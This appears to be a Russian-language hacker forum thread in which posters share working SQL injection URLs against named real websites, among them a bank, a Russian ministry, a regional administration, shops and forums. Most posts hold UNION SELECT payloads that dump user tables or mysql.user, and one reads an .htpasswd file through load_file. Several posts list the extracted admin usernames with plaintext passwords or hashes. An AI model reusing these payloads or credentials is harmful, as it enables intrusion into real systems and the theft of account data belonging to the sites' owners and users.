SQL Инъекции

geia.org.br/shop

Code:

http://geia.org.br/shop/detalhe.php?id=-197+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+35,1/*

 

какой-то банк
http://www.tsb.kz/info.php?id=180%20union%20select%201,version(),database(),4,5,user(),7,8/*

 

http://www.urlopwpolsce.pl/kategoria.php?id=17+order+by+2/*

 

www.Reflex.Se

Code:

http://www.reflex.se/news.php?ID=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7+from+users/*

 

Code:

http://www.eletrofar.com.br/shop/compra.php?id=-40%20UNION%20SELECT%201,2,version(),4,5,6/*

 

http://www.norden.ee/indexee.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

 

от \6/

а где ннъекция?

 

эээ вот тут была
http://www.norden.ee/indexee.php?ID=17,23+order+by+16

 

Code:

http://www.edu.upplands-bro.se/ubg/index.php?id=-214+union+select+1,user_name,user_password,4+from+admin/*

name:Super Admin
password:huggan

 

http://www.tvdata.ru/catalog.php?dir=-2+union+select+1,2,3,4,5,load_file('/home/www/htdocs/admin/.htpasswd'),7,8,9,10,11,12/*

http://www.offroad.ru/gallery/gal_picshow.php?g_id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*???

 

http://2pay.ru/geo/?id=0&st=0&a=2&town=1'
помогите ченить сделать дальше =)

 

Code:

http://christdot.org/modules.php?name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

дальше лень
в поиске ксс

 

avo.ru
Администрация Владимирской области

Code:

http://www.avo.ru/content.php?menu=1603&page_id=147+and+147=-1+union+select+1,concat(user,0x3a,password)+from+mysql.user/*

root:7bf340b309e53784

ipm.cz

Code:

http://www.ipm.cz/group/index.php?group=-1+union+select+1,2,3,4,5,6,concat(user,0x3a,password),8,9+from+mysql.user+limit+1,1/*

milada:5d6f92636d33cb3d

пароли в mysql4-hash


///извините за 2 поста подряд, редакт. не работает почему-то..

 

MP3Db.ru

Code:

http://mp3db.ru/index.php?cid=8&subcid=-1+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+users/*

пароли в md5

 

http://gp.by/admin

Ошибка понравилась очень

http://belarus21.by/admin

А с этим можно что-нить сделать? Union не идет.

 

МИНИСТЕРСТВО ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И СВЯЗИ РОССИЙСКОЙ Федерации

Code:

http://english.minsvyaz.ru/news.shtml?id=-1+UNION+SELECT+VERSION()/*&news_id=36

 

Code:

http://valiza.com.ua/opinions.php?id=-1+union+select+1,2,concat(username,char(58),email,char(58),password),4,5,6,7+from+phorum_users/*

 

http://forum.filippoff.ru/theme.php?id=-58+union+select+1,2,concat(login,char(58)pass),4,5,6,7,8,910,11,12+from+users+limit+0,1/*

Пасс в чистом виде=)

roman:331133

http://filippoff.ru/page.php?id=-12+union+select+1,concat(login,char(58),pass),3+from+user/*


http://www.montech.ru/index.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.fischer-fix.ru/index.php?id=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.lightpro.ru/news/detail.php?id_news=-3
http://www.chelkomp.ru/description.php?id=00000000046&grp=-1

 

Code:

http://www.jgts.net/post.php?id=-477+ORDER+BY+10/*

 

http://www.barcode.shark.ru/page.php?id=180%20union%20select%201,2,password,4,5,6,7,8,9,10%20from%20mysql.user/*

http://ventorg.ru/index.php?id=180%20union%20select%201/*

http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5,6,7,8,9,10/*